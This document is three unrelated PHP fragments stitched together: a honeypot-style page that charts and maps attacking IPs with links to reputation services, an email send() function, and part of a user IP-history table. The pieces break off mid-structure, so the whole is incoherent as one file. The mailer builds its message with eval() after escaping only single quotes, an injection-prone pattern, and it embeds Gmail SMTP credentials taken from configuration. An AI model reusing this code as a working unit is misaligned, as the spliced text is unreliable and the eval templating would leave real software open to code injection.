echo '<td>' . $row['source_ip'] . '</td>';
echo '<td>' . $row['count'] . '</td>';
echo '<td>' . $geodata->city . '</td>';
echo '<td>' . $geodata->region . '</td>';
echo '<td>' . $geodata->countryName . '</td>';
echo '<td>' . $geodata->countryCode . '</td>';
echo '<td>' . $geodata->latitude . '</td>';
echo '<td>' . $geodata->longitude . '</td>';
echo '<td>' . get_host($row['source_ip']) . '</td>';
echo '<td class="icon"><a href="http://www.dshield.org/ipinfo.html?ip=' . $row['source_ip'] . '" target="_blank"><img class="icon" src="images/dshield.ico"/></a></td>';
echo '<td class="icon"><a href="http://www.ipvoid.com/scan/' . $row['source_ip'] . '" target="_blank"><img class="icon" src="images/ipvoid.ico"/></a></td>';
echo '<td class="icon"><a href="http://www.robtex.com/ip/' . $row['source_ip'] . '.html" target="_blank"><img class="icon" src="images/robtex.ico"/></a></td>';
echo '<td class="icon"><a href="http://www.fortiguard.com/ip_rep/index.php?data=' . $row['source_ip'] . '&lookup=Lookup" target="_blank"><img class="icon" src="images/fortiguard.ico"/></a></td>';
echo '<td class="icon"><a href="http://labs.alienvault.com/labs/index.php/projects/open-source-ip-reputation-portal/information-about-ip/?ip=' . $row['source_ip'] . '" target="_blank"><img class="icon" src="images/alienvault.ico"/></a></td>';
echo '<td class="icon"><a href="http://www.reputationauthority.org/lookup.php?ip=' . $row['source_ip'] . '" target="_blank"><img class="icon" src="images/watchguard.ico"/></a></td>';
echo '<td class="icon"><a href="http://www.mcafee.com/threat-intelligence/ip/default.aspx?ip=' . $row['source_ip'] . '" target="_blank"><img class="icon" src="images/mcafee.ico"/></a></td>';
echo '<td class="icon"><a href="http://www.ip-adress.com/ip_tracer/' . $row['source_ip'] . '" target="_blank"><img class="icon" src="images/ip_tracer.png"/></a></td>';
echo '<td class="icon"><a href="https://www.virustotal.com/en/ip-address/' . $row['source_ip'] . '/information/" target="_blank"><img class="icon" src="images/virustotal.ico"/></a></td>';
echo '</tr>';
//Lastly, we increase the index used by maps to indicate the next row,
//and the dummy counter that indicates the next IP index (out of 10)
$col++;
$counter++;
}
//Close tbody and table element, it's ready.
echo '</tbody></table>';
echo '<hr /><br />';
//While still inside the if(count($rows)) clause (otherwise the dataSet will be empty),
//we set the bar chart's dataset, render the graph and display it (we're inside html code!)
$verticalChart->setDataSet($dataSet);
$verticalChart->setTitle(NUMBER_OF_CONNECTIONS_PER_UNIQUE_IP_CC);
//For this particular graph we need to set the corrent padding
$verticalChart->getPlot()->setGraphPadding(new Padding(5, 50, 100, 50));
//top, right, bottom, left | defaults: 5, 30, 50, 50
$verticalChart->render("generated-graphs/connections_per_ip_geo.png");
echo '<p>The following vertical bar chart visualizes the top 10 IPs ordered by the number of connections to the system.' . '<br/>Notice the two-letter country code to after each IP get a quick view of the locations where the attacks are coming from.</p>';
echo '<img src="generated-graphs/connections_per_ip_geo.png">';
//We set the pie chart's dataset, render the graph and display it (we're inside html code!)
$pieChart->setDataSet($dataSet);
$pieChart->setTitle(NUMBER_OF_CONNECTIONS_PER_UNIQUE_IP_CC);
$pieChart->render("generated-graphs/connections_per_ip_geo_pie.png");
echo '<p>The following pie chart visualizes the top 10 IPs ordered by the number of connections to the system.' . '<br/>Notice the two-letter country code to after each IP get a quick view of the locations where the attacks are coming from.</p>';
echo '<img src="generated-graphs/connections_per_ip_geo_pie.png">';
echo '<hr /><br />';
//Charts are ready, so is Google Map, let's render it below
echo '<p>The following zoomable world map marks the geographic locations of the top 10 IPs according to their latitude and longitude values. ' . 'Click on them to get the full information available from the database.<p>';
//echo '<div align=center>';
echo $gMapTop10->render();
//echo '</div>';
echo '<br/><hr /><br />';
//Lastly, we prepare the data for the Intesity Map
$db_query_map = "SELECT country, SUM(counter) AS sum\n FROM temp_ip\n GROUP BY country\n ORDER BY SUM(counter) DESC ";
//LIMIT 10 ";
$rows = R::getAll($db_query_map);
if (count($rows)) {
$col = 0;
//Dummy row index
//For every row returned from the database add the values to Intensity Map's table and intensityPieChart
foreach ($rows as $row) {
$countryProbes = $row['country'] . " - " . $row['sum'];
$intensityDataSet->addPoint(new Point($countryProbes, $row['sum']));
$intensityMap->setValues(array(array($col, 0, (string) $row['country']), array($col, 1, (int) $row['sum'])));
$col++;
}
}
//Intensity Map is ready, render it
echo '<p>The following Intensity Map shows the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.</p>';
echo $intensityMap->render();
echo '<br/>';
//We set the "intensity" pie chart's dataset, render the graph and display it (we're inside html code!)
$intensityPieChart->setDataSet($intensityDataSet);
$intensityPieChart->setTitle(NUMBER_OF_CONNECTIONS_PER_COUNTRY);
$intensityPieChart->render("generated-graphs/connections_per_country_pie.png");
echo '<p>The following pie chart visualizes the volume of attacks per country by summarising probes originating from the same nation, using the same IP or not.</p>';
echo '<img src="generated-graphs/connections_per_country_pie.png">';
if (GEO_METHOD == 'LOCAL') {
echo '<hr /><small><a href="http://www.maxmind.com">http://www.maxmind.com</a></small><br />';
} else {
if (GEO_METHOD == 'GEOPLUGIN') {
echo '<hr /><small><a href="http://www.geoplugin.com/geolocation/" target="_new">IP Geolocation</a> by <a href="http://www.geoplugin.com/" target="_new">geoPlugin</a></small><br />';
} else {
//TODO
}
}
}
//END IF
}
function send()
{
global $core, $user;
// Escape all quotes, else the eval will fail.
$this->msg = str_replace("'", "\\'", $this->msg);
$this->msg = preg_replace('#\\{([a-z0-9\\-_]*?)\\}#is', "' . \$\\1 . '", $this->msg);
// Set vars
reset($this->vars);
while (list($key, $val) = each($this->vars)) {
${$key} = $val;
}
eval("\$this->msg = '{$this->msg}';");
// Clear vars
foreach ($this->vars as $key => $val) {
unset(${$key});
}
// We now try and pull a subject from the email body ... if it exists,
// do this here because the subject may contain a variable
$drop_header = '';
$match = array();
if (preg_match('#^(Subject:(.*?))$#m', $this->msg, $match)) {
$this->subject = trim($match[2]) != '' ? trim($match[2]) : ($this->subject != '' ? $this->subject : 'No Subject');
$drop_header .= '[\\r\\n]*?' . preg_quote($match[1], '#');
} else {
$this->subject = $this->subject != '' ? $this->subject : 'No Subject';
}
if (preg_match('#^(Charset:(.*?))$#m', $this->msg, $match)) {
$this->encoding = trim($match[2]) != '' ? trim($match[2]) : _lang('ENCODING');
$drop_header .= '[\\r\\n]*?' . preg_quote($match[1], '#');
} else {
$this->encoding = _lang('ENCODING');
}
if ($drop_header != '') {
$this->msg = trim(preg_replace('#' . $drop_header . '#s', '', $this->msg));
}
$to = $this->addresses['to'];
$cc = isset($this->addresses['cc']) && count($this->addresses['cc']) ? implode(', ', $this->addresses['cc']) : '';
$bcc = isset($this->addresses['bcc']) && count($this->addresses['bcc']) ? implode(', ', $this->addresses['bcc']) : '';
// Build header
$this->extra_headers = ($this->reply_to != '' ? "Reply-to: {$this->reply_to}\n" : '') . ($this->from != '' ? "From: {$this->from}\n" : "From: " . $core->v('default_email') . "\n") . "Return-Path: " . $core->v('default_email') . "\nMessage-ID: <" . md5(uniqid(time())) . "@" . get_host() . ">\nMIME-Version: 1.0\nContent-type: text/" . $this->eformat . "; charset=" . $this->encoding . "\nContent-transfer-encoding: 8bit\nDate: " . date('r', time()) . "\nX-Priority: 2\nX-MSMail-Priority: High\n" . $this->extra_headers . ($cc != '' ? "Cc: {$cc}\n" : '') . ($bcc != '' ? "Bcc: {$bcc}\n" : '');
// Send message ... removed $this->encode() from subject for time being
$empty_to_header = $to == '' ? true : false;
$to = $to == '' ? 'Undisclosed-recipients:;' : $to;
if ($this->htmle) {
$this->msg = entity_decode($this->msg);
}
if ($core->v('mail_use_smtp')) {
require_once XFS . 'core/class.phpmailer.php';
$mail = new PHPMailer(true);
$mail->IsSMTP();
try {
$mail->SMTPDebug = 0;
$mail->Host = 'ssl://smtp.gmail.com:465';
$mail->Port = 465;
$mail->Username = $core->v('mail_ticket_login');
$mail->Password = $core->v('mail_ticket_key');
$mail->SMTPAuth = TRUE;
$mail->AddAddress($to);
if ($this->reply_to != '') {
$mail->AddReplyTo($this->reply_to);
}
if (isset($this->addresses['cc']) && count($this->addresses['cc'])) {
foreach ($this->addresses['cc'] as $row) {
$mail->AddCC($row);
}
}
if (isset($this->addresses['bcc']) && count($this->addresses['bcc'])) {
foreach ($this->addresses['bcc'] as $row) {
$mail->AddBCC($row);
}
}
$mail->SetFrom($this->from);
$mail->Subject = _utf8($this->subject);
$this->msg = _utf8($this->msg);
$mail->MsgHTML(str_replace("\n", '<br />', $this->msg));
$mail->AltBody = $this->msg;
$mail->Send();
return true;
} catch (phpmailerException $e) {
echo $e->errorMessage();
//Pretty error messages from PHPMailer
} catch (Exception $e) {
echo $e->getMessage();
//Boring error messages from anything else!
}
return;
}
$result = @mail($to, $this->subject, preg_replace("#(?<!\r)\n#s", "\n", $this->msg), $this->extra_headers, "-f{$core->v('default_email')}");
// Did it work?
if (!$result) {
trigger_error('Failed sending email :: PHP :: ' . $result);
}
return true;
}
?>
[<a href="userhistory.php?action=ips&userid=<?php
echo $InviterID;
?>
" title="History">H</a>|<a href="/user.php?action=search&ip_history=on&ip=<?php
echo display_str($InviterIP);
?>
" title="Search">S</a>]</span><br />
</td>
<td>
<?php
echo get_host($IP);
?>
<br />
<?php
echo get_host($InviterIP);
?>
</td>
<td><?php
echo time_diff($Joined);
?>
<br /><?php
echo time_diff($InviterJoined);
?>
</td>
</tr>
<?php
}
?>
</table>
<div class="linkbox">
